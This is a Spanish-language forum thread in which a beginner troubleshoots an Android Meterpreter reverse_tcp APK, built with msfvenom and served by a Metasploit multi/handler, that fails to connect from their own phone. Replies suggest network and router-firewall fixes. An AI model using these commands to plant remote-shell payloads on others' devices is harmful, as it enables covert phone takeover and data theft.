(explotar) reverse_tcp ¿no se conectará? [cerrado]

1

está bien, así que soy un poco nuevo en la explotación, etc. pero parece que no entiendo por qué no puedo crear una conexión con mi teléfono y el controlador kali de TCP

Esto es lo que hago: primero hago la apk

root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=**(MYIP)** LPORT=**(MYPORT)** R >shell.apk

No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8326 bytes

Luego configuro el exploit:

msf > use multi/handler 

msf exploit(handler) > set payload android/meterpreter/reverse_tcp

payload => android/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST **(MYIP)** 

LHOST => **(MYIP)**

msf exploit(handler) > set LHOST **(MYPORT)**

LHOST => **(MYPORT)**

msf exploit(handler) > exploit

[*] Started reverse TCP handler on **(MYIP):(MYPORT)**

[*] Starting the payload handler...

Luego ejecuto shell.apk en mi samsung s7 edge y parece que no se puede conectar a la carga útil.

¿Puede alguien ayudar, por favor?

    
pregunta TheNabTriesToLearn 01.12.2016 - 21:07
fuente

2 respuestas

0

Asegúrese de que usted y el dispositivo estén conectados a la misma red. Además, la aplicación debe estar ejecutándose en segundo plano. ¿Lanzó la aplicación en su Samsung S7 después de haber iniciado la explotación? Creo que la aplicación de Android se llama "MainActivity".

    
respondido por el Gavin Youker 01.12.2016 - 21:26
fuente
-2

La solución resultó ser la siguiente:

Deshabilité el firewall de mi enrutador y funcionó.

    
respondido por el TheNabTriesToLearn 02.12.2016 - 16:18
fuente

Lea otras preguntas en las etiquetas